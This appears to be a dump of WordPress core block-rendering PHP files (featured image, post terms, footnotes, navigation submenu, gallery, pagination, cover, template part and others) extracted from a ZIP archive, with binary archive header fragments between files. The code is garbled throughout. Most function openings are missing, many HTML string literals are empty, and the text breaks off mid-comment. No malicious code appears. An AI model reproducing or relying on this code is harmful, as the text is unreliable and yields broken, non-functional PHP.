      "; } /** * Generate markup for the HTML element that will be used for the overlay. * * @param array $attributes Block attributes. * * @return string HTML markup in string format. */ function get_block_core_post_featured_image_overlay_element_markup( $attributes ) { $has_dim_background = isset( $attributes['dimRatio'] ) && $attributes['dimRatio']; $has_gradient = isset( $attributes['gradient'] ) && $attributes['gradient']; $has_custom_gradient = isset( $attributes['customGradient'] ) && $attributes['customGradient']; $has_solid_overlay = isset( $attributes['overlayColor'] ) && $attributes['overlayColor']; $has_custom_overlay = isset( $attributes['customOverlayColor'] ) && $attributes['customOverlayColor']; $class_names = array( 'wp-block-post-featured-image__overlay' ); $styles = array(); if ( ! $has_dim_background ) { return ''; } // Apply border classes and styles. $border_attributes = get_block_core_post_featured_image_border_attributes( $attributes ); if ( ! empty( $border_attributes['class'] ) ) { $class_names[] = $border_attributes['class']; } if ( ! empty( $border_attributes['style'] ) ) { $styles[] = $border_attributes['style']; } // Apply overlay and gradient classes. if ( $has_dim_background ) { $class_names[] = 'has-background-dim'; $class_names[] = "has-background-dim-{$attributes['dimRatio']}"; } if ( $has_solid_overlay ) { $class_names[] = "has-{$attributes['overlayColor']}-background-color"; } if ( $has_gradient || $has_custom_gradient ) { $class_names[] = 'has-background-gradient'; } if ( $has_gradient ) { $class_names[] = "has-{$attributes['gradient']}-gradient-background"; } // Apply background styles. if ( $has_custom_gradient ) { $styles[] = sprintf( 'background-image: %s;', $attributes['customGradient'] ); } if ( $has_custom_overlay ) { $styles[] = sprintf( 'background-color: %s;', $attributes['customOverlayColor'] ); } return sprintf( '', esc_attr( implode( ' ', $class_names ) ), esc_attr( safecss_filter_attr( implode( ' ', $styles ) ) ) ); } /** * Generates class names and styles to apply the border support styles for * the Post Featured Image block. * * @param array $attributes The block attributes. * @return array The border-related classnames and styles for the block. */ function get_block_core_post_featured_image_border_attributes( $attributes ) { $border_styles = array(); $sides = array( 'top', 'right', 'bottom', 'left' ); // Border radius. if ( isset( $attributes['style']['border']['radius'] ) ) { $border_styles['radius'] = $attributes['style']['border']['radius']; } // Border style. if ( isset( $attributes['style']['border']['style'] ) ) { $border_styles['style'] = $attributes['style']['border']['style']; } // Border width. if ( isset( $attributes['style']['border']['width'] ) ) { $border_styles['width'] = $attributes['style']['border']['width']; } // Border color. $preset_color = array_key_exists( 'borderColor', $attributes ) ? "var:preset|color|{$attributes['borderColor']}" : null; $custom_color = $attributes['style']['border']['color'] ?? null; $border_styles['color'] = $preset_color ? $preset_color : $custom_color; // Individual border styles e.g. top, left etc. foreach ( $sides as $side ) { $border = $attributes['style']['border'][ $side ] ?? null; $border_styles[ $side ] = array( 'color' => isset( $border['color'] ) ? $border['color'] : null, 'style' => isset( $border['style'] ) ? $border['style'] : null, 'width' => isset( $border['width'] ) ? $border['width'] : null, ); } $styles = wp_style_engine_get_styles( array( 'border' => $border_styles ) ); $attributes = array(); if ( ! empty( $styles['classnames'] ) ) { $attributes['class'] = $styles['classnames']; } if ( ! empty( $styles['css'] ) ) { $attributes['style'] = $styles['css']; } return $attributes; } /** * Registers the `core/post-featured-image` block on the server. */ function register_block_core_post_featured_image() { register_block_type_from_metadata( __DIR__ . '/post-featured-image', array( 'render_callback' => 'render_block_core_post_featured_image', ) ); } add_action( 'init', 'register_block_core_post_featured_image' ); PK7[d?): : post-terms.phpnu[context['postId'] ) || ! isset( $attributes['term'] ) ) { return ''; } if ( ! is_taxonomy_viewable( $attributes['term'] ) ) { return ''; } $post_terms = get_the_terms( $block->context['postId'], $attributes['term'] ); if ( is_wp_error( $post_terms ) || empty( $post_terms ) ) { return ''; } $classes = array( 'taxonomy-' . $attributes['term'] ); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $separator = empty( $attributes['separator'] ) ? ' ' : $attributes['separator']; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); $prefix = "
      "; if ( isset( $attributes['prefix'] ) && $attributes['prefix'] ) { $prefix .= '' . $attributes['prefix'] . ''; } $suffix = '
      '; if ( isset( $attributes['suffix'] ) && $attributes['suffix'] ) { $suffix = '' . $attributes['suffix'] . '' . $suffix; } return get_the_term_list( $block->context['postId'], $attributes['term'], wp_kses_post( $prefix ), '' . esc_html( $separator ) . '', wp_kses_post( $suffix ) ); } /** * Registers the `core/post-terms` block on the server. */ function register_block_core_post_terms() { $taxonomies = get_taxonomies( array( 'publicly_queryable' => true, 'show_in_rest' => true, ), 'objects' ); // Split the available taxonomies to `built_in` and custom ones, // in order to prioritize the `built_in` taxonomies at the // search results. $built_ins = array(); $custom_variations = array(); // Create and register the eligible taxonomies variations. foreach ( $taxonomies as $taxonomy ) { $variation = array( 'name' => $taxonomy->name, 'title' => $taxonomy->label, 'description' => sprintf( /* translators: %s: taxonomy's label */ __( 'Display a list of assigned terms from the taxonomy: %s' ), $taxonomy->label ), 'attributes' => array( 'term' => $taxonomy->name, ), 'isActive' => array( 'term' ), 'scope' => array( 'inserter', 'transform' ), ); // Set the category variation as the default one. if ( 'category' === $taxonomy->name ) { $variation['isDefault'] = true; } if ( $taxonomy->_builtin ) { $built_ins[] = $variation; } else { $custom_variations[] = $variation; } } register_block_type_from_metadata( __DIR__ . '/post-terms', array( 'render_callback' => 'render_block_core_post_terms', 'variations' => array_merge( $built_ins, $custom_variations ), ) ); } add_action( 'init', 'register_block_core_post_terms' ); PK7[U!media-text.phpnu[ 'div', 'class_name' => 'wp-block-media-text', ); while ( $block_tag_processor->next_tag( $block_query ) ) { if ( $image_fill ) { // The markup below does not work with the deprecated `is-image-fill` class. $block_tag_processor->remove_class( 'is-image-fill' ); $block_tag_processor->add_class( 'is-image-fill-element' ); } } $content = $block_tag_processor->get_updated_html(); $media_tag_processor = new WP_HTML_Tag_Processor( $content ); $wrapping_figure_query = array( 'tag_name' => 'figure', 'class_name' => 'wp-block-media-text__media', ); if ( $has_media_on_right ) { // Loop through all the figure tags and set a bookmark on the last figure tag. while ( $media_tag_processor->next_tag( $wrapping_figure_query ) ) { $media_tag_processor->set_bookmark( 'last_figure' ); } if ( $media_tag_processor->has_bookmark( 'last_figure' ) ) { $media_tag_processor->seek( 'last_figure' ); // Insert a unique ID to identify the figure tag. $media_tag_processor->set_attribute( 'id', $unique_id ); } } else { if ( $media_tag_processor->next_tag( $wrapping_figure_query ) ) { // Insert a unique ID to identify the figure tag. $media_tag_processor->set_attribute( 'id', $unique_id ); } } $content = $media_tag_processor->get_updated_html(); // Add the image tag inside the figure tag, and update the image attributes // in order to display the featured image. $media_size_slug = isset( $attributes['mediaSizeSlug'] ) ? $attributes['mediaSizeSlug'] : 'full'; $image_tag = ''; $content = preg_replace( '/()/', '$1' . $image_tag, $content ); $image_tag_processor = new WP_HTML_Tag_Processor( $content ); if ( $image_tag_processor->next_tag( array( 'tag_name' => 'figure', 'id' => $unique_id, ) ) ) { // The ID is only used to ensure that the correct figure tag is selected, // and can now be removed. $image_tag_processor->remove_attribute( 'id' ); if ( $image_tag_processor->next_tag( array( 'tag_name' => 'img', 'class_name' => 'wp-block-media-text__featured_image', ) ) ) { $image_tag_processor->set_attribute( 'src', esc_url( $current_featured_image ) ); $image_tag_processor->set_attribute( 'class', 'wp-image-' . get_post_thumbnail_id() . ' size-' . $media_size_slug ); $image_tag_processor->set_attribute( 'alt', trim( strip_tags( get_post_meta( get_post_thumbnail_id(), '_wp_attachment_image_alt', true ) ) ) ); if ( $image_fill ) { $image_tag_processor->set_attribute( 'style', 'object-position:' . $focal_point . ';' ); } $content = $image_tag_processor->get_updated_html(); } } return $content; } /** * Registers the `core/media-text` block renderer on server. * * @since 6.6.0 */ function register_block_core_media_text() { register_block_type_from_metadata( __DIR__ . '/media-text', array( 'render_callback' => 'render_block_core_media_text', ) ); } add_action( 'init', 'register_block_core_media_text' ); PK7[uق footnotes.phpnu[context['postId'] ) ) { return ''; } if ( post_password_required( $block->context['postId'] ) ) { return; } $footnotes = get_post_meta( $block->context['postId'], 'footnotes', true ); if ( ! $footnotes ) { return; } $footnotes = json_decode( $footnotes, true ); if ( ! is_array( $footnotes ) || count( $footnotes ) === 0 ) { return ''; } $wrapper_attributes = get_block_wrapper_attributes(); $footnote_index = 1; $block_content = ''; foreach ( $footnotes as $footnote ) { // Translators: %d: Integer representing the number of return links on the page. $aria_label = sprintf( __( 'Jump to footnote reference %1$d' ), $footnote_index ); $block_content .= sprintf( '
    5. %2$s ↩︎
    6. ', $footnote['id'], $footnote['content'], $aria_label ); ++$footnote_index; } return sprintf( '
        %2$s
      ', $wrapper_attributes, $block_content ); } /** * Registers the `core/footnotes` block on the server. * * @since 6.3.0 */ function register_block_core_footnotes() { foreach ( array( 'post', 'page' ) as $post_type ) { register_post_meta( $post_type, 'footnotes', array( 'show_in_rest' => true, 'single' => true, 'type' => 'string', 'revisions_enabled' => true, ) ); } register_block_type_from_metadata( __DIR__ . '/footnotes', array( 'render_callback' => 'render_block_core_footnotes', ) ); } add_action( 'init', 'register_block_core_footnotes' ); /** * Adds the footnotes field to the revisions display. * * @since 6.3.0 * * @param array $fields The revision fields. * @return array The revision fields. */ function wp_add_footnotes_to_revision( $fields ) { $fields['footnotes'] = __( 'Footnotes' ); return $fields; } add_filter( '_wp_post_revision_fields', 'wp_add_footnotes_to_revision' ); /** * Gets the footnotes field from the revision for the revisions screen. * * @since 6.3.0 * * @param string $revision_field The field value, but $revision->$field * (footnotes) does not exist. * @param string $field The field name, in this case "footnotes". * @param object $revision The revision object to compare against. * @return string The field value. */ function wp_get_footnotes_from_revision( $revision_field, $field, $revision ) { return get_metadata( 'post', $revision->ID, $field, true ); } add_filter( '_wp_post_revision_field_footnotes', 'wp_get_footnotes_from_revision', 10, 3 ); PK7[8 post-comments-form.phpnu[context['postId'] ) ) { return ''; } if ( post_password_required( $block->context['postId'] ) ) { return; } $classes = array( 'comment-respond' ); // See comment further below. if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); add_filter( 'comment_form_defaults', 'post_comments_form_block_form_defaults' ); ob_start(); comment_form( array(), $block->context['postId'] ); $form = ob_get_clean(); remove_filter( 'comment_form_defaults', 'post_comments_form_block_form_defaults' ); // We use the outermost wrapping `
      ` returned by `comment_form()` // which is identified by its default classname `comment-respond` to inject // our wrapper attributes. This way, it is guaranteed that all styling applied // to the block is carried along when the comment form is moved to the location // of the 'Reply' link that the user clicked by Core's `comment-reply.js` script. $form = str_replace( 'class="comment-respond"', $wrapper_attributes, $form ); // Enqueue the comment-reply script. wp_enqueue_script( 'comment-reply' ); return $form; } /** * Registers the `core/post-comments-form` block on the server. */ function register_block_core_post_comments_form() { register_block_type_from_metadata( __DIR__ . '/post-comments-form', array( 'render_callback' => 'render_block_core_post_comments_form', ) ); } add_action( 'init', 'register_block_core_post_comments_form' ); /** * Use the button block classes for the form-submit button. * * @param array $fields The default comment form arguments. * * @return array Returns the modified fields. */ function post_comments_form_block_form_defaults( $fields ) { if ( wp_is_block_theme() ) { $fields['submit_button'] = ''; $fields['submit_field'] = '

      %1$s %2$s

      '; } return $fields; } PK7[|B#B#navigation-submenu.phpnu[ array(), 'inline_styles' => '', ); $has_named_font_size = array_key_exists( 'fontSize', $context ); $has_custom_font_size = isset( $context['style']['typography']['fontSize'] ); if ( $has_named_font_size ) { // Add the font size class. $font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] ); } elseif ( $has_custom_font_size ) { // Add the custom font size inline style. $font_sizes['inline_styles'] = sprintf( 'font-size: %s;', wp_get_typography_font_size_value( array( 'size' => $context['style']['typography']['fontSize'], ) ) ); } return $font_sizes; } /** * Returns the top-level submenu SVG chevron icon. * * @return string */ function block_core_navigation_submenu_render_submenu_icon() { return ''; } /** * Renders the `core/navigation-submenu` block. * * @param array $attributes The block attributes. * @param string $content The saved content. * @param WP_Block $block The parsed block. * * @return string Returns the post content with the legacy widget added. */ function render_block_core_navigation_submenu( $attributes, $content, $block ) { $navigation_link_has_id = isset( $attributes['id'] ) && is_numeric( $attributes['id'] ); $is_post_type = isset( $attributes['kind'] ) && 'post-type' === $attributes['kind']; $is_post_type = $is_post_type || isset( $attributes['type'] ) && ( 'post' === $attributes['type'] || 'page' === $attributes['type'] ); // Don't render the block's subtree if it is a draft. if ( $is_post_type && $navigation_link_has_id && 'publish' !== get_post_status( $attributes['id'] ) ) { return ''; } // Don't render the block's subtree if it has no label. if ( empty( $attributes['label'] ) ) { return ''; } $font_sizes = block_core_navigation_submenu_build_css_font_sizes( $block->context ); $style_attribute = $font_sizes['inline_styles']; $css_classes = trim( implode( ' ', $font_sizes['css_classes'] ) ); $has_submenu = count( $block->inner_blocks ) > 0; $kind = empty( $attributes['kind'] ) ? 'post_type' : str_replace( '-', '_', $attributes['kind'] ); $is_active = ! empty( $attributes['id'] ) && get_queried_object_id() === (int) $attributes['id'] && ! empty( get_queried_object()->$kind ); $show_submenu_indicators = isset( $block->context['showSubmenuIcon'] ) && $block->context['showSubmenuIcon']; $open_on_click = isset( $block->context['openSubmenusOnClick'] ) && $block->context['openSubmenusOnClick']; $open_on_hover_and_click = isset( $block->context['openSubmenusOnClick'] ) && ! $block->context['openSubmenusOnClick'] && $show_submenu_indicators; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $css_classes . ' wp-block-navigation-item' . ( $has_submenu ? ' has-child' : '' ) . ( $open_on_click ? ' open-on-click' : '' ) . ( $open_on_hover_and_click ? ' open-on-hover-click' : '' ) . ( $is_active ? ' current-menu-item' : '' ), 'style' => $style_attribute, ) ); $label = ''; if ( isset( $attributes['label'] ) ) { $label .= wp_kses_post( $attributes['label'] ); } $aria_label = sprintf( /* translators: Accessibility text. %s: Parent page title. */ __( '%s submenu' ), wp_strip_all_tags( $label ) ); $html = '
    7. '; // If Submenus open on hover, we render an anchor tag with attributes. // If submenu icons are set to show, we also render a submenu button, so the submenu can be opened on click. if ( ! $open_on_click ) { $item_url = isset( $attributes['url'] ) ? $attributes['url'] : ''; // Start appending HTML attributes to anchor tag. $html .= '
    8. ', $wrapper_attributes, esc_url( $edit_comment_link ), $link_atts, esc_html__( 'Edit' ) ); } /** * Registers the `core/comment-edit-link` block on the server. */ function register_block_core_comment_edit_link() { register_block_type_from_metadata( __DIR__ . '/comment-edit-link', array( 'render_callback' => 'render_block_core_comment_edit_link', ) ); } add_action( 'init', 'register_block_core_comment_edit_link' ); PK7[qnVVpage-list-item.phpnu[ $inner_block ) { if ( 'core/image' === $inner_block['blockName'] ) { if ( ! isset( $parsed_block['innerBlocks'][ $key ]['attrs']['data-id'] ) && isset( $inner_block['attrs']['id'] ) ) { $parsed_block['innerBlocks'][ $key ]['attrs']['data-id'] = esc_attr( $inner_block['attrs']['id'] ); } } } } return $parsed_block; } add_filter( 'render_block_data', 'block_core_gallery_data_id_backcompatibility' ); /** * Adds a style tag for the --wp--style--unstable-gallery-gap var. * * The Gallery block needs to recalculate Image block width based on * the current gap setting in order to maintain the number of flex columns * so a css var is added to allow this. * * @param array $attributes Attributes of the block being rendered. * @param string $content Content of the block being rendered. * @return string The content of the block being rendered. */ function block_core_gallery_render( $attributes, $content ) { $gap = $attributes['style']['spacing']['blockGap'] ?? null; // Skip if gap value contains unsupported characters. // Regex for CSS value borrowed from `safecss_filter_attr`, and used here // because we only want to match against the value, not the CSS attribute. if ( is_array( $gap ) ) { foreach ( $gap as $key => $value ) { // Make sure $value is a string to avoid PHP 8.1 deprecation error in preg_match() when the value is null. $value = is_string( $value ) ? $value : ''; $value = $value && preg_match( '%[\\\(&=}]|/\*%', $value ) ? null : $value; // Get spacing CSS variable from preset value if provided. if ( is_string( $value ) && str_contains( $value, 'var:preset|spacing|' ) ) { $index_to_splice = strrpos( $value, '|' ) + 1; $slug = _wp_to_kebab_case( substr( $value, $index_to_splice ) ); $value = "var(--wp--preset--spacing--$slug)"; } $gap[ $key ] = $value; } } else { // Make sure $gap is a string to avoid PHP 8.1 deprecation error in preg_match() when the value is null. $gap = is_string( $gap ) ? $gap : ''; $gap = $gap && preg_match( '%[\\\(&=}]|/\*%', $gap ) ? null : $gap; // Get spacing CSS variable from preset value if provided. if ( is_string( $gap ) && str_contains( $gap, 'var:preset|spacing|' ) ) { $index_to_splice = strrpos( $gap, '|' ) + 1; $slug = _wp_to_kebab_case( substr( $gap, $index_to_splice ) ); $gap = "var(--wp--preset--spacing--$slug)"; } } $unique_gallery_classname = wp_unique_id( 'wp-block-gallery-' ); $processed_content = new WP_HTML_Tag_Processor( $content ); $processed_content->next_tag(); $processed_content->add_class( $unique_gallery_classname ); // --gallery-block--gutter-size is deprecated. --wp--style--gallery-gap-default should be used by themes that want to set a default // gap on the gallery. $fallback_gap = 'var( --wp--style--gallery-gap-default, var( --gallery-block--gutter-size, var( --wp--style--block-gap, 0.5em ) ) )'; $gap_value = $gap ? $gap : $fallback_gap; $gap_column = $gap_value; if ( is_array( $gap_value ) ) { $gap_row = isset( $gap_value['top'] ) ? $gap_value['top'] : $fallback_gap; $gap_column = isset( $gap_value['left'] ) ? $gap_value['left'] : $fallback_gap; $gap_value = $gap_row === $gap_column ? $gap_row : $gap_row . ' ' . $gap_column; } // The unstable gallery gap calculation requires a real value (such as `0px`) and not `0`. if ( '0' === $gap_column ) { $gap_column = '0px'; } // Set the CSS variable to the column value, and the `gap` property to the combined gap value. $gallery_styles = array( array( 'selector' => ".wp-block-gallery.{$unique_gallery_classname}", 'declarations' => array( '--wp--style--unstable-gallery-gap' => $gap_column, 'gap' => $gap_value, ), ), ); wp_style_engine_get_stylesheet_from_css_rules( $gallery_styles, array( 'context' => 'block-supports', ) ); return (string) $processed_content; } /** * Registers the `core/gallery` block on server. */ function register_block_core_gallery() { register_block_type_from_metadata( __DIR__ . '/gallery', array( 'render_callback' => 'block_core_gallery_render', ) ); } add_action( 'init', 'register_block_core_gallery' ); PK7[1bbquery-pagination-next.phpnu[context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page'; $enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination']; $page = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ]; $max_page = isset( $block->context['query']['pages'] ) ? (int) $block->context['query']['pages'] : 0; $wrapper_attributes = get_block_wrapper_attributes(); $show_label = isset( $block->context['showLabel'] ) ? (bool) $block->context['showLabel'] : true; $default_label = __( 'Next Page' ); $label_text = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? esc_html( $attributes['label'] ) : $default_label; $label = $show_label ? $label_text : ''; $pagination_arrow = get_query_pagination_arrow( $block, true ); if ( ! $label ) { $wrapper_attributes .= ' aria-label="' . $label_text . '"'; } if ( $pagination_arrow ) { $label .= $pagination_arrow; } $content = ''; // Check if the pagination is for Query that inherits the global context. if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) { $filter_link_attributes = static function () use ( $wrapper_attributes ) { return $wrapper_attributes; }; add_filter( 'next_posts_link_attributes', $filter_link_attributes ); // Take into account if we have set a bigger `max page` // than what the query has. global $wp_query; if ( $max_page > $wp_query->max_num_pages ) { $max_page = $wp_query->max_num_pages; } $content = get_next_posts_link( $label, $max_page ); remove_filter( 'next_posts_link_attributes', $filter_link_attributes ); } elseif ( ! $max_page || $max_page > $page ) { $custom_query = new WP_Query( build_query_vars_from_query_block( $block, $page ) ); $custom_query_max_pages = (int) $custom_query->max_num_pages; if ( $custom_query_max_pages && $custom_query_max_pages !== $page ) { $content = sprintf( '%3$s', esc_url( add_query_arg( $page_key, $page + 1 ) ), $wrapper_attributes, $label ); } wp_reset_postdata(); // Restore original Post Data. } if ( $enhanced_pagination && isset( $content ) ) { $p = new WP_HTML_Tag_Processor( $content ); if ( $p->next_tag( array( 'tag_name' => 'a', 'class_name' => 'wp-block-query-pagination-next', ) ) ) { $p->set_attribute( 'data-wp-key', 'query-pagination-next' ); $p->set_attribute( 'data-wp-on--click', 'actions.core.query.navigate' ); $p->set_attribute( 'data-wp-on--mouseenter', 'actions.core.query.prefetch' ); $p->set_attribute( 'data-wp-effect', 'effects.core.query.prefetch' ); $content = $p->get_updated_html(); } } return $content; } /** * Registers the `core/query-pagination-next` block on the server. */ function register_block_core_query_pagination_next() { register_block_type_from_metadata( __DIR__ . '/query-pagination-next', array( 'render_callback' => 'render_block_core_query_pagination_next', ) ); } add_action( 'init', 'register_block_core_query_pagination_next' ); PK7[K5//comment-author-name.phpnu[context['commentId'] ) ) { return ''; } $comment = get_comment( $block->context['commentId'] ); $commenter = wp_get_current_commenter(); $show_pending_links = isset( $commenter['comment_author'] ) && $commenter['comment_author']; if ( empty( $comment ) ) { return ''; } $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); $comment_author = get_comment_author( $comment ); $link = get_comment_author_url( $comment ); if ( ! empty( $link ) && ! empty( $attributes['isLink'] ) && ! empty( $attributes['linkTarget'] ) ) { $comment_author = sprintf( '%3s', esc_url( $link ), esc_attr( $attributes['linkTarget'] ), $comment_author ); } if ( '0' === $comment->comment_approved && ! $show_pending_links ) { $comment_author = wp_kses( $comment_author, array() ); } return sprintf( '
      %2$s
      ', $wrapper_attributes, $comment_author ); } /** * Registers the `core/comment-author-name` block on the server. */ function register_block_core_comment_author_name() { register_block_type_from_metadata( __DIR__ . '/comment-author-name', array( 'render_callback' => 'render_block_core_comment_author_name', ) ); } add_action( 'init', 'register_block_core_comment_author_name' ); PK7[~LM read-more.phpnu[context['postId'] ) ) { return ''; } $post_ID = $block->context['postId']; $post_title = get_the_title( $post_ID ); if ( '' === $post_title ) { $post_title = sprintf( /* translators: %s is post ID to describe the link for screen readers. */ __( 'untitled post %s' ), $post_ID ); } $screen_reader_text = sprintf( /* translators: %s is either the post title or post ID to describe the link for screen readers. */ __( ': %s' ), $post_title ); $justify_class_name = empty( $attributes['justifyContent'] ) ? '' : "is-justified-{$attributes['justifyContent']}"; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $justify_class_name ) ); $more_text = ! empty( $attributes['content'] ) ? wp_kses_post( $attributes['content'] ) : __( 'Read more' ); return sprintf( '%4s%5s', $wrapper_attributes, get_the_permalink( $post_ID ), esc_attr( $attributes['linkTarget'] ), $more_text, $screen_reader_text ); } /** * Registers the `core/read-more` block on the server. */ function register_block_core_read_more() { register_block_type_from_metadata( __DIR__ . '/read-more', array( 'render_callback' => 'render_block_core_read_more', ) ); } add_action( 'init', 'register_block_core_read_more' ); PK7[Q cover.phpnu[ 'wp-block-cover__image-background', 'data-object-fit' => 'cover', ); if ( isset( $attributes['focalPoint'] ) ) { $object_position = round( $attributes['focalPoint']['x'] * 100 ) . '% ' . round( $attributes['focalPoint']['y'] * 100 ) . '%'; $attr['data-object-position'] = $object_position; $attr['style'] = 'object-position: ' . $object_position; } $image = get_the_post_thumbnail( null, 'post-thumbnail', $attr ); /* * Inserts the featured image between the (1st) cover 'background' `span` and 'inner_container' `div`, * and removes eventual whitespace characters between the two (typically introduced at template level) */ $inner_container_start = '/]+wp-block-cover__inner-container[\s|"][^>]*>/U'; if ( 1 === preg_match( $inner_container_start, $content, $matches, PREG_OFFSET_CAPTURE ) ) { $offset = $matches[0][1]; $content = substr( $content, 0, $offset ) . $image . substr( $content, $offset ); } } else { if ( in_the_loop() ) { update_post_thumbnail_cache(); } $current_featured_image = get_the_post_thumbnail_url(); if ( ! $current_featured_image ) { return $content; } $processor = new WP_HTML_Tag_Processor( $content ); $processor->next_tag(); $styles = $processor->get_attribute( 'style' ); $merged_styles = ! empty( $styles ) ? $styles . ';' : ''; $merged_styles .= 'background-image:url(' . esc_url( $current_featured_image ) . ');'; $processor->set_attribute( 'style', $merged_styles ); $content = $processor->get_updated_html(); } return $content; } /** * Registers the `core/cover` block renderer on server. */ function register_block_core_cover() { register_block_type_from_metadata( __DIR__ . '/cover', array( 'render_callback' => 'render_block_core_cover', ) ); } add_action( 'init', 'register_block_core_cover' ); PK7[&uCm5 5 query-pagination-previous.phpnu[context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page'; $enhanced_pagination = isset( $block->context['enhancedPagination'] ) && $block->context['enhancedPagination']; $page = empty( $_GET[ $page_key ] ) ? 1 : (int) $_GET[ $page_key ]; $wrapper_attributes = get_block_wrapper_attributes(); $show_label = isset( $block->context['showLabel'] ) ? (bool) $block->context['showLabel'] : true; $default_label = __( 'Previous Page' ); $label_text = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? esc_html( $attributes['label'] ) : $default_label; $label = $show_label ? $label_text : ''; $pagination_arrow = get_query_pagination_arrow( $block, false ); if ( ! $label ) { $wrapper_attributes .= ' aria-label="' . $label_text . '"'; } if ( $pagination_arrow ) { $label = $pagination_arrow . $label; } $content = ''; // Check if the pagination is for Query that inherits the global context // and handle appropriately. if ( isset( $block->context['query']['inherit'] ) && $block->context['query']['inherit'] ) { $filter_link_attributes = static function () use ( $wrapper_attributes ) { return $wrapper_attributes; }; add_filter( 'previous_posts_link_attributes', $filter_link_attributes ); $content = get_previous_posts_link( $label ); remove_filter( 'previous_posts_link_attributes', $filter_link_attributes ); } elseif ( 1 !== $page ) { $content = sprintf( '%3$s', esc_url( add_query_arg( $page_key, $page - 1 ) ), $wrapper_attributes, $label ); } if ( $enhanced_pagination && isset( $content ) ) { $p = new WP_HTML_Tag_Processor( $content ); if ( $p->next_tag( array( 'tag_name' => 'a', 'class_name' => 'wp-block-query-pagination-previous', ) ) ) { $p->set_attribute( 'data-wp-key', 'query-pagination-previous' ); $p->set_attribute( 'data-wp-on--click', 'actions.core.query.navigate' ); $p->set_attribute( 'data-wp-on--mouseenter', 'actions.core.query.prefetch' ); $p->set_attribute( 'data-wp-effect', 'effects.core.query.prefetch' ); $content = $p->get_updated_html(); } } return $content; } /** * Registers the `core/query-pagination-previous` block on the server. */ function register_block_core_query_pagination_previous() { register_block_type_from_metadata( __DIR__ . '/query-pagination-previous', array( 'render_callback' => 'render_block_core_query_pagination_previous', ) ); } add_action( 'init', 'register_block_core_query_pagination_previous' ); PK7[TJ query-total.phpnu[context['query']['inherit'] ) && $block->context['query']['inherit'] ) { $query_to_use = $wp_query; $current_page = max( 1, (int) get_query_var( 'paged', 1 ) ); } else { $page_key = isset( $block->context['queryId'] ) ? 'query-' . $block->context['queryId'] . '-page' : 'query-page'; $current_page = isset( $_GET[ $page_key ] ) ? (int) $_GET[ $page_key ] : 1; $query_to_use = new WP_Query( build_query_vars_from_query_block( $block, $current_page ) ); } $max_rows = $query_to_use->found_posts; $posts_per_page = (int) $query_to_use->get( 'posts_per_page' ); // Calculate the range of posts being displayed. $start = ( 0 === $max_rows ) ? 0 : ( ( $current_page - 1 ) * $posts_per_page + 1 ); $end = min( $start + $posts_per_page - 1, $max_rows ); // Prepare the display based on the `displayType` attribute. $output = ''; switch ( $attributes['displayType'] ) { case 'range-display': if ( $start === $end ) { $output = sprintf( /* translators: 1: Start index of posts, 2: Total number of posts */ __( 'Displaying %1$s of %2$s' ), $start, $max_rows ); } else { $output = sprintf( /* translators: 1: Start index of posts, 2: End index of posts, 3: Total number of posts */ __( 'Displaying %1$s – %2$s of %3$s' ), $start, $end, $max_rows ); } break; case 'total-results': default: // translators: %d: number of results. $output = sprintf( _n( '%d result found', '%d results found', $max_rows ), $max_rows ); break; } return sprintf( '
      %2$s
      ', $wrapper_attributes, $output ); } /** * Registers the `query-total` block. * * @since 6.8.0 */ function register_block_core_query_total() { register_block_type_from_metadata( __DIR__ . '/query-total', array( 'render_callback' => 'render_block_core_query_total', ) ); } add_action( 'init', 'register_block_core_query_total' ); PK7[Ӵ&&template-part.phpnu[ 'wp_template_part', 'post_status' => 'publish', 'post_name__in' => array( $attributes['slug'] ), 'tax_query' => array( array( 'taxonomy' => 'wp_theme', 'field' => 'name', 'terms' => $theme, ), ), 'posts_per_page' => 1, 'no_found_rows' => true, 'lazy_load_term_meta' => false, // Do not lazy load term meta, as template parts only have one term. ) ); $template_part_post = $template_part_query->have_posts() ? $template_part_query->next_post() : null; if ( $template_part_post ) { // A published post might already exist if this template part was customized elsewhere // or if it's part of a customized template. $content = $template_part_post->post_content; $area_terms = get_the_terms( $template_part_post, 'wp_template_part_area' ); if ( ! is_wp_error( $area_terms ) && false !== $area_terms ) { $area = $area_terms[0]->name; } /** * Fires when a block template part is loaded from a template post stored in the database. * * @since 5.9.0 * * @param string $template_part_id The requested template part namespaced to the theme. * @param array $attributes The block attributes. * @param WP_Post $template_part_post The template part post object. * @param string $content The template part content. */ do_action( 'render_block_core_template_part_post', $template_part_id, $attributes, $template_part_post, $content ); } else { $template_part_file_path = ''; // Else, if the template part was provided by the active theme, // render the corresponding file content. if ( 0 === validate_file( $attributes['slug'] ) ) { $block_template = get_block_file_template( $template_part_id, 'wp_template_part' ); $content = $block_template->content; if ( isset( $block_template->area ) ) { $area = $block_template->area; } } if ( '' !== $content && null !== $content ) { /** * Fires when a block template part is loaded from a template part in the theme. * * @since 5.9.0 * * @param string $template_part_id The requested template part namespaced to the theme. * @param array $attributes The block attributes. * @param string $template_part_file_path Absolute path to the template path. * @param string $content The template part content. */ do_action( 'render_block_core_template_part_file', $template_part_id, $attributes, $template_part_file_path, $content ); } else { /** * Fires when a requested block template part does not exist in the database nor in the theme. * * @since 